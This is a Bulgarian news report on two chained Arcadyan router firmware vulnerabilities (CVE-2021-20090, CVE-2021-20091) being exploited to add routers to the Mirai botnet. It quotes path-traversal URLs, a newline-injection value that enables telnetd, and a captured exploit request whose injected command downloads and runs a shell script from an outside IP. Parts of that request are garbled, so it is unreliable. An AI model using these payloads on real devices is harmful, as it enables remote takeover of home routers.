Уязвимост Π² Π΄ΠΎΠΌΠ°ΡˆΠ½ΠΈΡ‚Π΅ Ρ€ΡƒΡ‚Π΅Ρ€ΠΈ, засягаща 17 производитСля

Π’ ΠΌΡ€Π΅ΠΆΠ°Ρ‚Π° Π΅ рСгистрирана масивна Π°Ρ‚Π°ΠΊΠ° срСщу домашни Ρ€ΡƒΡ‚Π΅Ρ€ΠΈ, Ρ‡ΠΈΠΉΡ‚ΠΎ Ρ„ΡŠΡ€ΠΌΡƒΠ΅Ρ€ ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π° рСализация Π½Π° HTTP ΡΡŠΡ€Π²ΡŠΡ€ ΠΎΡ‚ компанията Arcadyan. Π—Π° Π΄Π° сС ΠΏΠΎΠ»ΡƒΡ‡ΠΈ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ» Π½Π°Π΄ устройствата, сС ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π° комбинация ΠΎΡ‚ Π΄Π²Π΅ уязвимости, която позволява дистанционно изпълнСниС Π½Π° ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»Π΅Π½ ΠΊΠΎΠ΄ с root ΠΏΡ€Π°Π²Π°. ΠŸΡ€ΠΎΠ±Π»Π΅ΠΌΡŠΡ‚ засяга доста ΡˆΠΈΡ€ΠΎΠΊ Π½Π°Π±ΠΎΡ€ ΠΎΡ‚ ADSL Ρ€ΡƒΡ‚Π΅Ρ€ΠΈ ΠΎΡ‚ Arcadyan, ASUS ΠΈ Buffalo, ΠΊΠ°ΠΊΡ‚ΠΎ ΠΈ устройства, доставСни ΠΏΠΎΠ΄ ΠΌΠ°Ρ€ΠΊΠΈΡ‚Π΅ Beeline (ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΡŠΡ‚ Π΅ ΠΏΠΎΡ‚Π²ΡŠΡ€Π΄Π΅Π½ Π² Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ΠΈ Π΄Ρ€ΡƒΠ³ΠΈ Ρ‚Π΅Π»Π΅ΠΊΠΎΠΌ ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€ΠΈ. ΠžΡ‚Π±Π΅Π»ΡΠ·Π²Π° сС, Ρ‡Π΅ ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΡŠΡ‚ ΠΏΡ€ΠΈΡΡŠΡΡ‚Π²Π° във Ρ„ΡŠΡ€ΠΌΡƒΠ΅Ρ€Π° Π½Π° Arcadyan ΠΏΠΎΠ²Π΅Ρ‡Π΅ ΠΎΡ‚ 10 Π³ΠΎΠ΄ΠΈΠ½ΠΈ ΠΈ ΠΏΡ€Π΅Π· Ρ‚ΠΎΠ²Π° Π²Ρ€Π΅ΠΌΠ΅ Π΅ успял Π΄Π° ΠΌΠΈΠ³Ρ€ΠΈΡ€Π° към Π½Π°ΠΉ-ΠΌΠ°Π»ΠΊΠΎ 20 ΠΌΠΎΠ΄Π΅Π»Π° устройства ΠΎΡ‚ 17 Ρ€Π°Π·Π»ΠΈΡ‡Π½ΠΈ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ΄ΠΈΡ‚Π΅Π»ΠΈ.

ΠŸΡŠΡ€Π²Π°Ρ‚Π° уязвимост, CVE-2021-20090, ΠΏΡ€Π°Π²ΠΈ възмоТСн Π΄ΠΎΡΡ‚ΡŠΠΏ Π΄ΠΎ всСки скрипт Π½Π° ΡƒΠ΅Π± интСрфСйс Π±Π΅Π· удостовСряванС. Π‘ΡŠΡ‰Π½ΠΎΡΡ‚Ρ‚Π° Π½Π° уязвимостта Π΅, Ρ‡Π΅ Π² ΡƒΠ΅Π± интСрфСйса някои Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ, ΠΏΡ€Π΅Π· ΠΊΠΎΠΈΡ‚ΠΎ сС ΠΈΠ·ΠΏΡ€Π°Ρ‰Π°Ρ‚ изобраТСния, CSS Ρ„Π°ΠΉΠ»ΠΎΠ²Π΅ ΠΈ JavaScript скриптовС, са Π΄ΠΎΡΡ‚ΡŠΠΏΠ½ΠΈ Π±Π΅Π· удостовСряванС. Π’ Ρ‚ΠΎΠ·ΠΈ случай Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈΡ‚Π΅, Π·Π° ΠΊΠΎΠΈΡ‚ΠΎ Π΅ Ρ€Π°Π·Ρ€Π΅ΡˆΠ΅Π½ Π΄ΠΎΡΡ‚ΡŠΠΏ Π±Π΅Π· удостовСряванС, сС провСряват с ΠΏΠΎΠΌΠΎΡ‰Ρ‚Π° Π½Π° ΠΏΡŠΡ€Π²ΠΎΠ½Π°Ρ‡Π°Π»Π½Π°Ρ‚Π° маска. ΠŸΠΎΡΠΎΡ‡Π²Π°Π½Π΅Ρ‚ΠΎ Π½Π° Π·Π½Π°Ρ†ΠΈ β€ž../β€œ Π² ΠΏΡŠΡ‚ΠΈΡ‰Π°Ρ‚Π° Π·Π° ΠΏΡ€Π΅ΠΌΠΈΠ½Π°Π²Π°Π½Π΅ към родитСлската дирСктория Π΅ Π±Π»ΠΎΠΊΠΈΡ€Π°Π½ΠΎ ΠΎΡ‚ Ρ„ΡŠΡ€ΠΌΡƒΠ΅Ρ€Π°, Π½ΠΎ ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°Π½Π΅Ρ‚ΠΎ Π½Π° комбинацията β€ž..%2fβ€œ сС пропуска. По Ρ‚ΠΎΠ·ΠΈ Π½Π°Ρ‡ΠΈΠ½ Π΅ възмоТно Π΄Π° сС отварят Π·Π°Ρ‰ΠΈΡ‚Π΅Π½ΠΈ страници ΠΏΡ€ΠΈ ΠΈΠ·ΠΏΡ€Π°Ρ‰Π°Π½Π΅ Π½Π° заявки ΠΊΠ°Ρ‚ΠΎ β€žhttp://192.168.1.1/images/..%2findex.htmβ€œ.

Π’Ρ‚ΠΎΡ€Π°Ρ‚Π° уязвимост, CVE-2021-20091, позволява Π½Π° удостовСрСн ΠΏΠΎΡ‚Ρ€Π΅Π±ΠΈΡ‚Π΅Π» Π΄Π° ΠΏΡ€Π°Π²ΠΈ ΠΏΡ€ΠΎΠΌΠ΅Π½ΠΈ Π² систСмнитС настройки Π½Π° устройството Ρ‡Ρ€Π΅Π· ΠΈΠ·ΠΏΡ€Π°Ρ‰Π°Π½Π΅ Π½Π° спСциално Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ΠΈΡ€Π°Π½ΠΈ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΈ към скрипта apply_abstract.cgi, ΠΊΠΎΠΉΡ‚ΠΎ Π½Π΅ провСрява Π·Π° Π½Π°Π»ΠΈΡ‡ΠΈΠ΅Ρ‚ΠΎ Π½Π° символ Π·Π° Π½ΠΎΠ² Ρ€Π΅Π΄ Π² ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΈΡ‚Π΅ . НапримСр, ΠΊΠΎΠ³Π°Ρ‚ΠΎ ΠΈΠ·Π²ΡŠΡ€ΡˆΠ²Π° ping опСрация, атакуващият ΠΌΠΎΠΆΠ΅ Π΄Π° посочи стойността β€ž192.168.1.2%0AARC_SYS_TelnetdEnable=1β€œ Π² ΠΏΠΎΠ»Π΅Ρ‚ΠΎ с IP адрСса, ΠΊΠΎΠΉΡ‚ΠΎ сС провСрява, ΠΈ скрипта, ΠΊΠΎΠ³Π°Ρ‚ΠΎ създава Ρ„Π°ΠΉΠ»Π° с настройки /tmp/etc/config/ .glbcfg, Ρ‰Π΅ запишС Ρ€Π΅Π΄Π° β€œAARC_SYS_TelnetdEnable=1” Π² Π½Π΅Π³ΠΎ ", ΠΊΠΎΠΉΡ‚ΠΎ Π°ΠΊΡ‚ΠΈΠ²ΠΈΡ€Π° telnetd ΡΡŠΡ€Π²ΡŠΡ€Π°, ΠΊΠΎΠΉΡ‚ΠΎ осигурява Π½Π΅ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡Π΅Π½ Π΄ΠΎΡΡ‚ΡŠΠΏ Π΄ΠΎ ΠΊΠΎΠΌΠ°Π½Π΄Π½Π°Ρ‚Π° ΠΎΠ±Π²ΠΈΠ²ΠΊΠ° с root ΠΏΡ€Π°Π²Π°. По ΡΡŠΡ‰ΠΈΡ Π½Π°Ρ‡ΠΈΠ½, ΠΊΠ°Ρ‚ΠΎ Π·Π°Π΄Π°Π΄Π΅Ρ‚Π΅ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚ΡŠΡ€Π° AARC_SYS, ΠΌΠΎΠΆΠ΅Ρ‚Π΅ Π΄Π° ΠΈΠ·ΠΏΡŠΠ»Π½ΠΈΡ‚Π΅ всСки ΠΊΠΎΠ΄ Π² систСмата. ΠŸΡŠΡ€Π²Π°Ρ‚Π° уязвимост ΠΏΡ€Π°Π²ΠΈ възмоТно стартиранСто Π½Π° ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠ΅Π½ скрипт Π±Π΅Π· удостовСряванС Ρ‡Ρ€Π΅Π· Π΄ΠΎΡΡ‚ΡŠΠΏ Π΄ΠΎ Π½Π΅Π³ΠΎ ΠΊΠ°Ρ‚ΠΎ β€ž/images/..%2fapply_abstract.cgiβ€œ.

Π—Π° Π΄Π° ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π° уязвимоститС, атакуващият трябва Π΄Π° ΠΌΠΎΠΆΠ΅ Π΄Π° ΠΈΠ·ΠΏΡ€Π°Ρ‚ΠΈ заявка Π΄ΠΎ мрСТовия ΠΏΠΎΡ€Ρ‚, Π½Π° ΠΊΠΎΠΉΡ‚ΠΎ Ρ€Π°Π±ΠΎΡ‚ΠΈ ΡƒΠ΅Π± ΠΈΠ½Ρ‚Π΅Ρ€Ρ„Π΅ΠΉΡΡŠΡ‚. БъдСйки ΠΏΠΎ Π΄ΠΈΠ½Π°ΠΌΠΈΠΊΠ°Ρ‚Π° Π½Π° разпространСниС Π½Π° Π°Ρ‚Π°ΠΊΠ°Ρ‚Π°, ΠΌΠ½ΠΎΠ³ΠΎ ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€ΠΈ оставят Π΄ΠΎΡΡ‚ΡŠΠΏ Π΄ΠΎ устройствата си ΠΎΡ‚ Π²ΡŠΠ½ΡˆΠ½Π°Ρ‚Π° ΠΌΡ€Π΅ΠΆΠ°, Π·Π° Π΄Π° опростят диагностициранСто Π½Π° ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠΈ ΠΎΡ‚ слуТбата Π·Π° ΠΏΠΎΠ΄Π΄Ρ€ΡŠΠΆΠΊΠ°. Ако Π΄ΠΎΡΡ‚ΡŠΠΏΡŠΡ‚ Π΄ΠΎ интСрфСйса Π΅ ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡Π΅Π½ само Π΄ΠΎ Π²ΡŠΡ‚Ρ€Π΅ΡˆΠ½Π°Ρ‚Π° ΠΌΡ€Π΅ΠΆΠ°, Π°Ρ‚Π°ΠΊΠ°Ρ‚Π° ΠΌΠΎΠΆΠ΅ Π΄Π° бъдС ΠΈΠ·Π²ΡŠΡ€ΡˆΠ΅Π½Π° ΠΎΡ‚ външна ΠΌΡ€Π΅ΠΆΠ° с ΠΏΠΎΠΌΠΎΡ‰Ρ‚Π° Π½Π° Ρ‚Π΅Ρ…Π½ΠΈΠΊΠ°Ρ‚Π° β€žDNS rebindingβ€œ. УязвимоститС Π²Π΅Ρ‡Π΅ сС ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°Ρ‚ Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎ Π·Π° ΡΠ²ΡŠΡ€Π·Π²Π°Π½Π΅ Π½Π° Ρ€ΡƒΡ‚Π΅Ρ€ΠΈ към Π±ΠΎΡ‚Π½Π΅Ρ‚Π° Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Π’Ρ€ΡŠΠ·ΠΊΠ°: Π·Π°Ρ‚Π²ΠΎΡ€Π΅Ρ‚Π΅ User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

Π˜Π·Ρ‚ΠΎΡ‡Π½ΠΈΠΊ: opennet.ru

ДобавянС Π½Π° Π½ΠΎΠ² ΠΊΠΎΠΌΠ΅Π½Ρ‚Π°Ρ€